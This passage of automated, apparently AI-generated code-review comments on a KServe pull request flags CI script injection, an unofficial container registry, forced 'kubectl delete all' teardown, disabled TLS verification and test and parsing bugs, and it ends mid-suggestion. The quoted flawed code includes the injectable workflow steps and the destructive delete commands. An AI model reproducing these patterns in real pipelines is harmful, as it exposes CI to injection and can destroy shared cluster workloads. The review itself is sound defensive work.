Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-llmisvc.yaml around lines 244 - 353, The job
lacks explicit least-privilege job-level permissions and unsafe interpolation of
event data in run blocks: add a permissions: block to each job (e.g.,
detect-changes, llmisvc-image-build, test-llmisvc,
test-llmisvc-wva-autoscaling-hpa and the other autoscaling job) granting only
the scopes required (likely minimal read for contents and write only if needed
for status/artifacts), and remove direct use of ${{
github.event.pull_request.base.ref }} inside the "Merge target branch" run
steps; instead expose the base ref via a safe context or env var (e.g., set env:
BASE_REF: ${{ github.base_ref }} on the job) and reference that env var (e.g.,
$BASE_REF) in the git commands, or use action inputs like github.base_ref in a
preceding step to avoid interpolating event payloads in run:.

Comment on lines +255 to +262
- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# First, check if the file exists and its line count
wc -l .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 109


🏁 Script executed:

# View lines 255-262 to confirm the snippet
sed -n '255,262p' .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 436


🏁 Script executed:

# View lines 365-372 to verify the second instance
sed -n '365,372p' .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 436


Stop injecting github.event.pull_request.base.ref straight into the shell.

Splicing event data directly into run: blocks exposes these steps to script injection (CWE-94). Pass the ref through env: and quote it in the shell instead.

🔒 Proposed fix
       - name: Merge target branch
         if: github.event_name == 'pull_request'
+        env:
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         run: |
           git fetch --unshallow origin
-          git fetch origin ${{ github.event.pull_request.base.ref }}
+          git fetch origin "$BASE_REF"
           git config user.email "ci@kserve.io"
           git config user.name "CI Bot"
-          git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
+          git merge --no-edit "origin/$BASE_REF"

Same issue at lines 365-372.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
- name: Merge target branch
if: github.event_name == 'pull_request'
env:
BASE_REF: ${{ github.event.pull_request.base.ref }}
run: |
git fetch --unshallow origin
git fetch origin "$BASE_REF"
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit "origin/$BASE_REF"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-llmisvc.yaml around lines 255 - 262, The workflow
step "Merge target branch" injects github.event.pull_request.base.ref directly
into the run shell, which risks script injection; change the step to pass the
ref via an env variable (e.g., BASE_REF: ${{ github.event.pull_request.base.ref
}}) and then reference and quote that env var in the run commands (use
"$BASE_REF" when calling git fetch and git merge) to ensure safe shell
expansion; apply the same env-based fix to the other Merge/merge-ref step found
later in the file.
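The injection this fix prevents is easy to demonstrate outside Actions: a branch name is attacker-influenced text, and textual substitution into a script lets embedded metacharacters execute, while env-var indirection keeps the value data. A contrived standalone sketch (the hostile ref value is invented for illustration):

```shell
#!/bin/sh
# Attacker-influenced "branch name" with an embedded command.
ref='main; echo INJECTED'

# Unsafe: emulate ${{ ... }} textual substitution into the script.
# The semicolon terminates the echo and runs the second command.
unsafe=$(sh -c "echo fetching $ref")

# Safe: pass the value through the environment and quote the
# expansion, so the whole string stays a single argument.
safe=$(BASE_REF="$ref" sh -c 'echo fetching "$BASE_REF"')

echo "unsafe: $unsafe"
echo "safe: $safe"
```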

Comment on lines +37 to +45
- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
- uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3.0.2

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# Find and display the workflow file
find . -name "e2e-test-quick-install.yaml" -o -name "e2e-test-quick-install.yml"

Repository: opendatahub-io/kserve

Length of output: 113


🏁 Script executed:

# Read the workflow file to examine the flagged sections
cat -n .github/workflows/e2e-test-quick-install.yaml

Repository: opendatahub-io/kserve

Length of output: 9185


Move github.event.pull_request.base.ref to environment variables and quote all uses.

Direct event data interpolation in run: blocks enables script injection (CWE-94). Pass event values via env: with proper shell quoting instead.

This pattern appears at lines 41, 44, 76, 79, 143, and 146—all instances of the same vulnerability across the three "Merge target branch" steps.

Proposed fix
       - name: Merge target branch
         if: github.event_name == 'pull_request'
+        env:
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         run: |
           git fetch --unshallow origin
-          git fetch origin ${{ github.event.pull_request.base.ref }}
+          git fetch origin "$BASE_REF"
           git config user.email "ci@kserve.io"
           git config user.name "CI Bot"
-          git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
+          git merge --no-edit "origin/$BASE_REF"

Apply this to all three "Merge target branch" steps (lines 37–45, 72–80, 139–147).

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-quick-install.yaml around lines 37 - 45, In each
"Merge target branch" step, avoid direct event interpolation in the run block:
add an env entry (e.g., TARGET_REF: ${{ github.event.pull_request.base.ref }})
to the step and replace direct uses of ${{ github.event.pull_request.base.ref }}
in the run script with the shell-quoted variable "$TARGET_REF"; specifically
update the git fetch origin ... and git merge --no-edit origin/... commands in
the "Merge target branch" steps (also apply the same change to the other two
identical steps) so all event data comes from env and every shell use is
properly quoted.

name: mlpipeline-s3-artifact
key: secretkey
image: docker.io/chrislusf/seaweedfs:4.07@sha256:10fa7df90911dd83439f4d3d792a1c5c6c630121cb2094ba209f42d4b0ca975d
image: quay.io/flysangel/chrislusf/seaweedfs@sha256:a27e9c432f1dfaafb5bb3f5b39065c0df7a15423a3894025c714b3f06f998aeb

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🌐 Web query:

What is the official SeaweedFS container image repository (Docker Hub and Quay), maintained by the SeaweedFS project?

💡 Result:

The official SeaweedFS container image repository maintained by the SeaweedFS project is on Docker Hub at chrislusf/seaweedfs. There is no official Quay.io repository identified in the sources.



Critical security issue: image sourced from unofficial registry introduces supply-chain compromise risk (CWE-829, CWE-345).

Exploit scenario: non-official Quay.io repositories bypass upstream provenance verification. Account takeover or registry misconfiguration allows attacker-controlled binaries to execute with cluster credentials and full network access.

Remediation (use official Docker Hub upstream)
-        image: quay.io/flysangel/chrislusf/seaweedfs@sha256:a27e9c432f1dfaafb5bb3f5b39065c0df7a15423a3894025c714b3f06f998aeb
+        image: docker.io/chrislusf/seaweedfs@sha256:a27e9c432f1dfaafb5bb3f5b39065c0df7a15423a3894025c714b3f06f998aeb

SeaweedFS maintains its official image on Docker Hub (chrislusf/seaweedfs), not Quay.io. Enforce signature verification and registry allowlists via Kyverno/Gatekeeper admission policies so digest pinning alone does not give a false sense of security.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/test/s3-local-backend/seaweedfs-deployment.yaml` at line 34,
Replace the non-official image reference in the image: line
(quay.io/flysangel/chrislusf/seaweedfs@sha256:...) with the official SeaweedFS
image (chrislusf/seaweedfs) pinned to a verified digest or explicit trusted tag;
update the image source to Docker Hub (or your approved internal registry) and
ensure you verify signatures (not just digest) before deploying. Additionally,
add/enable admission controls (Kyverno or Gatekeeper) to enforce a registry
allowlist and image signature verification so future diffs cannot reintroduce
quay.io/flysangel/* images without policy approval.
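Until a Kyverno/Gatekeeper policy is in place, the same allowlist idea can also run as a cheap CI guard that rejects image references from unapproved registries. A minimal sketch; the allowlist entries here are illustrative, not the project's actual policy:

```shell
#!/bin/sh
# Classify an image reference against a registry allowlist.
# Any reference outside the approved set is reported as denied.
check_image() {
  image=$1
  case "$image" in
    docker.io/chrislusf/seaweedfs*) echo allowed ;;   # official upstream
    registry.internal.example/*)    echo allowed ;;   # hypothetical mirror
    *)                              echo denied ;;
  esac
}

a=$(check_image "docker.io/chrislusf/seaweedfs@sha256:abc")
b=$(check_image "quay.io/flysangel/chrislusf/seaweedfs@sha256:abc")
echo "$a $b"
```

In CI this would be driven by grepping image: lines out of the manifests and failing the job on any denied result.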

Comment on lines +771 to +773
helm uninstall "${PROMETHEUS_RELEASE_NAME}" -n "${PROMETHEUS_NAMESPACE}" 2>/dev/null || true
kubectl delete all --all -n "${PROMETHEUS_NAMESPACE}" --force --grace-period=0 2>/dev/null || true
kubectl delete namespace "${PROMETHEUS_NAMESPACE}" --wait=true --timeout=60s --force --grace-period=0 2>/dev/null || true

⚠️ Potential issue | 🔴 Critical

kubectl delete all --all -n <ns> is a blast radius grenade.

The uninstall paths in uninstall_prometheus_helm, uninstall_keda_helm, and uninstall_wva_helm blindly wipe every resource in the all category in monitoring / keda / wva-system. On a cluster where those namespaces are shared (monitoring is a very common shared namespace), unrelated tenants lose workloads with --force --grace-period=0. helm uninstall alone already removes the resources it installed, which it tracks in its release records; the extra delete is unnecessary and actively dangerous.

Same pattern in all three uninstall functions.

🛠️ Proposed fix
     helm uninstall "${PROMETHEUS_RELEASE_NAME}" -n "${PROMETHEUS_NAMESPACE}" 2>/dev/null || true
-    kubectl delete all --all -n "${PROMETHEUS_NAMESPACE}" --force --grace-period=0 2>/dev/null || true
-    kubectl delete namespace "${PROMETHEUS_NAMESPACE}" --wait=true --timeout=60s --force --grace-period=0 2>/dev/null || true
+    # Namespace deletion is only safe for dedicated test namespaces; remove if sharing.
+    kubectl delete namespace "${PROMETHEUS_NAMESPACE}" --wait=true --timeout=60s 2>/dev/null || true

At minimum, gate the nuke behind an explicit flag (e.g. --purge-namespace) so a CI teardown can't strip a shared cluster.

Also applies to: 860-861, 903-905

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 771 - 773, The uninstall functions uninstall_prometheus_helm,
uninstall_keda_helm, and uninstall_wva_helm currently run "kubectl delete all
--all -n <namespace> --force --grace-period=0" which will indiscriminately
delete non-chart resources; remove these kubectl delete all calls or wrap them
behind an explicit opt-in flag (e.g. --purge-namespace) checked in the uninstall
functions so the default uninstall only uses helm uninstall (and optional
kubectl delete namespace if desired) and the destructive "delete all" is only
executed when the purge flag is provided.
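The opt-in gating suggested here is a few lines of shell: keep helm uninstall unconditional, and run anything destructive only behind an explicit flag. A dry-run sketch (commands are echoed rather than executed, and names are illustrative):

```shell
#!/bin/sh
# Dry-run sketch of a flag-gated teardown: the safe helm uninstall
# always runs; namespace deletion requires --purge-namespace.
uninstall_prometheus_helm() {
  echo "helm uninstall prometheus -n monitoring"
  if [ "${PURGE_NAMESPACE:-false}" = true ]; then
    # Destructive teardown only on explicit opt-in.
    echo "kubectl delete namespace monitoring --wait=true --timeout=60s"
  fi
}

default=$(uninstall_prometheus_helm)   # flag unset: helm uninstall only

PURGE_NAMESPACE=true                   # caller passed --purge-namespace
purged=$(uninstall_prometheus_helm)    # now also deletes the namespace

printf 'default:\n%s\npurged:\n%s\n' "$default" "$purged"
```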

Comment on lines +933 to +937
--set wva.prometheus.baseURL="${WVA_PROMETHEUS_URL}" \
--set wva.prometheus.tls.insecureSkipVerify=true \
--set wva.prometheus.serviceAccountName="prometheus-kube-prometheus-prometheus" \
--set wva.prometheus.monitoringNamespace="${PROMETHEUS_NAMESPACE:-monitoring}" \
--set wva.metrics.secure=false \

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🌐 Web query:

workload-variant-autoscaler helm chart prometheus tls caSecretName values

💡 Result:

Answer: The workload-variant-autoscaler Helm chart does not expose a value named prometheus.tls.caSecretName for configuring Prometheus TLS CA verification. Instead, it expects you to provide the Prometheus CA certificate via a file/inline value (caCert) which is then mounted/used by the controller, and it uses the env/config keys PROMETHEUS_CA_CERT_PATH (path) plus PROMETHEUS_TLS_INSECURE_SKIP_VERIFY (boolean) for TLS behavior.

What to use instead (chart/repo-supported knobs):

1) In the WVA controller deployment, Prometheus TLS verification is configured via:
- PROMETHEUS_BASE_URL (must be HTTPS in production)
- PROMETHEUS_CA_CERT_PATH (path to the CA cert for TLS verification)
- PROMETHEUS_TLS_INSECURE_SKIP_VERIFY (dev/test only)

2) In the Helm values, the Prometheus TLS CA is provided as a certificate value/file (shown in the repo's install/values guidance as a file upload flag, and in values snippets as wva.prometheus.caCert / tls.caCertPath).

Practical implication:
- If you were looking for a "caSecretName" pattern (as many charts use), it is not present in this chart's documented configuration.
- Configure CA verification by supplying the CA cert content/file so the chart can place it into the controller pod and set PROMETHEUS_CA_CERT_PATH accordingly.

Example (from the repo's documented Helm install flow):

helm upgrade -i workload-variant-autoscaler ./charts/workload-variant-autoscaler \
  --namespace workload-variant-autoscaler-system \
  --set-file prometheus.caCert=/tmp/prometheus-ca.crt \
  ...

Evidence:
- The Prometheus integration doc lists PROMETHEUS_CA_CERT_PATH and PROMETHEUS_TLS_INSECURE_SKIP_VERIFY as the TLS controls.
- The install/README shows --set-file prometheus.caCert=... as the way to provide the CA cert.
- A Helm values snippet in an issue shows the chart's Prometheus TLS section uses tls.caCertPath (path) and caCert (content), not caSecretName.



🏁 Script executed:

#!/bin/bash
# Search for WVA/workload-variant chart references and values files
fd -t f 'values.*\.ya?ml' | head -20

Repository: opendatahub-io/kserve

Length of output: 476


🏁 Script executed:

#!/bin/bash
# Search for Prometheus TLS config patterns in the installation script
rg 'prometheus.*tls|caSecretName|caCert|PROMETHEUS' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -A 2 -B 2

Repository: opendatahub-io/kserve

Length of output: 4156


🏁 Script executed:

#!/bin/bash
# Look for WVA chart documentation or references within the repo
fd -t f -i 'readme|doc.*prometheus|chart.*values' | grep -i wva

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Search for WVA-related chart files
fd -t f 'values.*\.ya?ml' charts/ | xargs grep -l 'prometheus\|wva' 2>/dev/null

Repository: opendatahub-io/kserve

Length of output: 49


🏁 Script executed:

#!/bin/bash
# Look for WVA chart directory
find charts/ -type d -iname '*wva*' -o -iname '*workload*' 2>/dev/null

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Search within the install script for WVA helm chart source/repo
rg 'helm.*repo|helm.*add|wva.*chart' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -B 2 -A 2

Repository: opendatahub-io/kserve

Length of output: 498


🏁 Script executed:

#!/bin/bash
# Find WVA helm repo source and install command in the script
rg 'helm.*install.*wva|helm.*add.*wva|llm-d-wva' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -B 5 -A 15

Repository: opendatahub-io/kserve

Length of output: 820


🏁 Script executed:

#!/bin/bash
# Get context around line 933 where the WVA settings are
sed -n '900,950p' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh

Repository: opendatahub-io/kserve

Length of output: 2101


🏁 Script executed:

#!/bin/bash
# Search for any WVA or llm-d documentation in the repo
rg -i 'llm-d|workload.*variant|wva' --type md hack/setup/

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Look for environment variable setup or certificate extraction logic
rg 'prometheus.*tls|caCert|PROMETHEUS_CA' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -B 3 -A 3

Repository: opendatahub-io/kserve

Length of output: 1713


🏁 Script executed:

#!/bin/bash
# Check if there's a way to extract the prometheus-tls cert in the script
rg 'kubectl.*secret|kubectl.*get.*prometheus-tls' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Check for any secret extraction or certificate handling in the script
rg 'kubectl.*extract|kubectl.*get.*secret|base64|tls.crt|ca.crt' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh | head -20

Repository: opendatahub-io/kserve

Length of output: 145


🏁 Script executed:

#!/bin/bash
# Look for any helm install patterns that use --set-file with secrets
rg '\-\-set-file|extract.*secret|ca.*crt' hack/setup/quick-install/ -r

Repository: opendatahub-io/kserve

Length of output: 479


🏁 Script executed:

#!/bin/bash
# Get full WVA install section to see all parameters
sed -n '925,950p' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh

Repository: opendatahub-io/kserve

Length of output: 1167


insecureSkipVerify=true on Prometheus TLS config — CWE-295 (Improper Certificate Validation).

WVA connects to Prometheus over HTTPS (baseURL is https://...) but skips hostname/issuer verification, defeating the cert-manager-issued cert created above and enabling MITM on the Prometheus control-plane traffic (credential sniffing, metric spoofing that drives autoscaling decisions → replica flaps). Combined with wva.metrics.secure=false, the install posture is "TLS off by default".

The self-signed CA is already minted and stored in the prometheus-tls secret — mount it and verify instead. The WVA chart does not support caSecretName; use prometheus.caCert instead:

🛠️ Proposed direction

Extract the CA certificate from the prometheus-tls secret and pass it to WVA:

-        --set wva.prometheus.tls.insecureSkipVerify=true \
+        --set wva.prometheus.tls.insecureSkipVerify=false \
+        --set-file wva.prometheus.caCert=<(kubectl get secret prometheus-tls -n monitoring -o jsonpath='{.data.ca\.crt}' | base64 -d) \

Or inline the cert content directly if prometheus.caCert is the parameter. Verify against the WVA chart's values.yaml for exact parameter names (may be prometheus.caCert, prometheus.tls.caCert, or similar).

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
--set wva.prometheus.baseURL="${WVA_PROMETHEUS_URL}" \
--set wva.prometheus.tls.insecureSkipVerify=true \
--set wva.prometheus.serviceAccountName="prometheus-kube-prometheus-prometheus" \
--set wva.prometheus.monitoringNamespace="${PROMETHEUS_NAMESPACE:-monitoring}" \
--set wva.metrics.secure=false \
--set wva.prometheus.baseURL="${WVA_PROMETHEUS_URL}" \
--set wva.prometheus.tls.insecureSkipVerify=false \
--set-file wva.prometheus.caCert=<(kubectl get secret prometheus-tls -n monitoring -o jsonpath='{.data.ca\.crt}' | base64 -d) \
--set wva.prometheus.serviceAccountName="prometheus-kube-prometheus-prometheus" \
--set wva.prometheus.monitoringNamespace="${PROMETHEUS_NAMESPACE:-monitoring}" \
--set wva.metrics.secure=false \
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 933 - 937, The Helm install currently disables TLS verification
(wva.prometheus.tls.insecureSkipVerify=true) and sets wva.metrics.secure=false;
change this to enable verification by removing or setting
wva.prometheus.tls.insecureSkipVerify=false and enabling secure metrics, and
provide the Prometheus CA to the WVA chart using the chart's CA parameter (e.g.,
prometheus.caCert or wva.prometheus.caCert as defined in the chart values).
Extract the CA certificate stored in the prometheus-tls secret and pass its PEM
content to the Helm command's caCert parameter (or update the values file) so
WVA validates Prometheus' server cert instead of skipping verification; ensure
references to the prometheus-tls secret and the chart parameter names
(prometheus-tls, wva.prometheus.tls.insecureSkipVerify, wva.metrics.secure,
prometheus.caCert / wva.prometheus.caCert) are used to locate the change.
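The extraction in the proposed fix is just a base64 decode of one key of the prometheus-tls secret (kubectl get secret ... -o jsonpath | base64 -d). The decode step can be sketched standalone; the PEM content below is a stand-in, not a real certificate:

```shell
#!/bin/sh
# Stand-in for the secret's ca.crt field, which Kubernetes stores
# base64-encoded in .data.
pem='-----BEGIN CERTIFICATE-----
MIIB...stand-in-certificate-body...
-----END CERTIFICATE-----'
encoded=$(printf '%s' "$pem" | base64)

# What the pipeline does: decode the field into a CA file that a
# chart's --set-file caCert parameter can consume.
printf '%s' "$encoded" | base64 -d > /tmp/prometheus-ca.crt
head -1 /tmp/prometheus-ca.crt
```

Against a live cluster, the first two steps would be replaced by reading the real secret with kubectl before handing the file to helm.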

Comment on lines +1571 to +1578
// Verify no scheduler deployment was created for the AMD instance
amdScheduler := &appsv1.Deployment{}
err = envTest.Get(ctx, client.ObjectKey{
Name: amdSvcName + "-kserve-epp",
Namespace: testNs.Name,
}, amdScheduler)
Expect(errors.IsNotFound(err)).To(BeTrue(),
"AMD instance should not create a scheduler deployment")

⚠️ Potential issue | 🟠 Major

Check the real scheduler Deployment name in this negative assertion.

The rest of this file resolves scheduler Deployments as -kserve-router-scheduler, but this test looks up -kserve-epp. That makes the assertion pass even if the AMD service actually creates a scheduler Deployment, so the regression check is ineffective.

🐛 Proposed fix
 			amdScheduler := &appsv1.Deployment{}
 			err = envTest.Get(ctx, client.ObjectKey{
-				Name:      amdSvcName + "-kserve-epp",
+				Name:      amdSvcName + "-kserve-router-scheduler",
 				Namespace: testNs.Name,
 			}, amdScheduler)
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
// Verify no scheduler deployment was created for the AMD instance
amdScheduler := &appsv1.Deployment{}
err = envTest.Get(ctx, client.ObjectKey{
Name: amdSvcName + "-kserve-epp",
Namespace: testNs.Name,
}, amdScheduler)
Expect(errors.IsNotFound(err)).To(BeTrue(),
"AMD instance should not create a scheduler deployment")
// Verify no scheduler deployment was created for the AMD instance
amdScheduler := &appsv1.Deployment{}
err = envTest.Get(ctx, client.ObjectKey{
Name: amdSvcName + "-kserve-router-scheduler",
Namespace: testNs.Name,
}, amdScheduler)
Expect(errors.IsNotFound(err)).To(BeTrue(),
"AMD instance should not create a scheduler deployment")
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/controller_int_scheduler_config_test.go`
around lines 1571 - 1578, The test's negative assertion checks the wrong
Deployment name: it looks up amdSvcName + "-kserve-epp" but all other tests
expect scheduler Deployments named amdSvcName + "-kserve-router-scheduler", so
the check can pass incorrectly; update the Get() call in the test to use
amdSvcName + "-kserve-router-scheduler" (the same scheduler name used elsewhere)
and keep the Expect(errors.IsNotFound(err)).To(BeTrue()) assertion to ensure no
scheduler Deployment was created for the AMD instance.

Comment on lines +1111 to +1122
func schedulerTransform(ctx context.Context, d *appsv1.Deployment) error {
version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
if !ok || version == "" {
version = "0.0.0"
}
v, err := semver.NewVersion(version)
if err != nil {
return fmt.Errorf("failed to parse version %q: %w", version, err)
}
if v.Compare(*semver.New("0.7.0")) < 0 {
return nil
}

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🌐 Web query:

github.com/coreos/go-semver NewVersion behavior with leading "v" prefix and non-strict versions

💡 Result:

The github.com/coreos/go-semver package provides semver.NewVersion(version string) (*Version, error), which parses the input string via the Version.Set method. This splits off metadata (+), prerelease (-), and then splits the core version into major.minor.patch using strings.SplitN(version, ".", 3). It validates each numeric part as int64 and identifiers with validateIdentifier.

For a leading "v" prefix: No explicit stripping or handling of a leading "v" is mentioned in available source snippets. Since examples use semver.New("1.2.3") without "v" and parsing starts directly on the version string expecting numeric parts after splitting, a leading "v" like "v1.2.3" will cause SplitN to produce ["v1","2","3"], failing numeric parsing for major (cannot parse "v1" as int64). Thus, NewVersion("v1.2.3") returns an error. Users should strip the "v" prefix manually before passing to NewVersion if present.

For non-strict versions: The library enforces semver rules strictly. Numeric parts must parse to int64 without leading zeros (likely via validateIdentifier checking no leading zeros), identifiers are limited to [0-9A-Za-z-], and no empty parts are allowed. Invalid formats like "1.2" (missing patch), leading zeros "01.2.3", or invalid characters fail with errors like "invalid dotted-tri format" or validation errors. It does not coerce incomplete versions to ".0"; it requires a full major.minor.patch.
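For quick local checks of the same threshold rule (skip the transform below 0.7.0), sort -V orders dotted version strings numerically. A sketch for ad-hoc verification only; as the query result above notes, go-semver itself rejects a leading "v", so this shell check is a rough analogue of the Go path, not a substitute for it:

```shell
#!/bin/sh
# Returns "yes" when $1 >= $2 under version ordering (sort -V).
version_at_least() {
  lowest=$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n1)
  if [ "$lowest" = "$2" ]; then echo yes; else echo no; fi
}

a=$(version_at_least "0.7.1" "0.7.0")   # at or above the threshold
b=$(version_at_least "0.6.9" "0.7.0")   # below the threshold
echo "$a $b"
```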



🏁 Script executed:

# Find the scheduler.go file and examine the function call chain
fd "scheduler.go" -t f | head -5

Repository: opendatahub-io/kserve

Length of output: 110


🏁 Script executed:

# Search for expectedSchedulerDeployment and its calls to schedulerTransform
rg "expectedSchedulerDeployment|reconcileSchedulerDeployment" --type go -A 3 -B 1

Repository: opendatahub-io/kserve

Length of output: 1470


🏁 Script executed:

# Verify the call chain by looking for where schedulerTransform is called
rg "schedulerTransform" --type go -B 2 -A 2

Repository: opendatahub-io/kserve

Length of output: 2797


🏁 Script executed:

# Examine the scheduler_test.go file around schedulerTransform tests
rg "schedulerTransform" -A 15 -B 5 pkg/controller/v1alpha2/llmisvc/scheduler_test.go | head -80

Repository: opendatahub-io/kserve

Length of output: 1545


🏁 Script executed:

# Look for test cases with version annotations to understand expected behavior
rg "app.kubernetes.io/version" --type go -B 3 -A 3

Repository: opendatahub-io/kserve

Length of output: 3085


🏁 Script executed:

# Find all version test cases in the scheduler_test.go
rg "version.*=" pkg/controller/v1alpha2/llmisvc/scheduler_test.go | grep -E "version\s*:" | head -30

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

# Look at TestSchedulerTransformThreshold test structure to see version values
sed -n '/func TestSchedulerTransformThreshold/,/^func /p' pkg/controller/v1alpha2/llmisvc/scheduler_test.go | head -100

Repository: opendatahub-io/kserve

Length of output: 3506


🏁 Script executed:

# Check if there are any tests with malformed versions or error cases
rg "TestSchedulerTransform|malformed|invalid|error" pkg/controller/v1alpha2/llmisvc/scheduler_test.go | head -20

Repository: opendatahub-io/kserve

Length of output: 162


🏁 Script executed:

# Look more carefully at all test cases to see if any test invalid versions
sed -n '/version.*:/,/validateConfig/p' pkg/controller/v1alpha2/llmisvc/scheduler_test.go | grep -E 'version|name:' | head -40

Repository: opendatahub-io/kserve

Length of output: 434


🏁 Script executed:

# Check for any test with version like "v0.7.0" or malformed versions
rg '"v[0-9]|malformed|invalid' pkg/controller/v1alpha2/llmisvc/scheduler_test.go



🏁 Script executed:

# Look for all test cases to see the full range of tested versions
sed -n '/tests := \[\]/,/for _, tt := range tests/p' pkg/controller/v1alpha2/llmisvc/scheduler_test.go | grep -E 'name:|version:' | head -50



🏁 Script executed:

# Check if there's admission control or validation webhook for this annotation
fd "admission|webhook|validat" --type f | grep -i "llm\|scheduler"



🏁 Script executed:

# Search for any version validation or admission webhook in the controller
rg "ValidatingWebhook|app.kubernetes.io/version" --type go -B 3 -A 3 | head -40



🏁 Script executed:

# Let's see how the version annotation might be set - check user-facing docs or examples
fd "README|example|sample" -t f | xargs grep -l "app.kubernetes.io/version" 2>/dev/null



🏁 Script executed:

# Check if the annotation is set anywhere in the codebase - look for where it's created
rg "app.kubernetes.io/version" --type go | grep -v "test\|//"



🏁 Script executed:

# Examine the validation webhooks to see if they validate pod annotations
head -100 pkg/apis/serving/v1alpha2/llm_inference_service_validation.go



🏁 Script executed:

# Check if scheduler.go is actually in a controller package to verify it's part of reconciliation
head -50 pkg/controller/v1alpha2/llmisvc/scheduler.go



🏁 Script executed:

# Verify that the annotation is actually user-provided by checking if Deployment is created from LLMInferenceService spec
rg "LLMInferenceService" pkg/controller/v1alpha2/llmisvc/scheduler.go | head -5



Malformed app.kubernetes.io/version annotation blocks scheduler reconciliation.

semver.NewVersion from github.com/coreos/go-semver is strict: a leading v (e.g., v0.7.0), a missing patch component (0.7), or any other non-SemVer format returns an error. That error propagates through expectedSchedulerDeployment → reconcileSchedulerDeployment and blocks all subsequent reconciliation attempts until the annotation is corrected by hand. A typo or a common format variation (e.g., pasting a release tag with its v prefix) becomes a permanent outage for the scheduler.

Either trim the leading v, default to 0.0.0 on parse error (with a log line), or reject invalid annotations at admission time rather than at reconcile time.
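The tolerant-parsing idea above can be sketched with the standard library alone (the actual code uses github.com/coreos/go-semver for the parse itself); normalizeVersion is a hypothetical helper name for illustration, not part of the KServe codebase:

```go
package main

import (
	"fmt"
	"strings"
)

// normalizeVersion sketches the suggested sanitization: trim surrounding
// whitespace and a leading "v" so common release-tag formats like "v0.7.0"
// become strict SemVer input, and fall back to "0.0.0" when the annotation
// is empty. (Hypothetical helper; the real fix feeds the result into
// semver.NewVersion.)
func normalizeVersion(raw string) string {
	v := strings.TrimPrefix(strings.TrimSpace(raw), "v")
	if v == "" {
		return "0.0.0"
	}
	return v
}

func main() {
	for _, raw := range []string{"v0.7.0", " 0.8.1 ", ""} {
		fmt.Printf("%q -> %q\n", raw, normalizeVersion(raw))
	}
}
```

Note this only handles the v-prefix and empty cases; a truly malformed value (e.g. "0.7") would still need the logging fallback or admission-time rejection described above.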

Suggested fix
 	version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
 	if !ok || version == "" {
 		version = "0.0.0"
 	}
-	v, err := semver.NewVersion(version)
+	v, err := semver.NewVersion(strings.TrimPrefix(version, "v"))
 	if err != nil {
-		return fmt.Errorf("failed to parse version %q: %w", version, err)
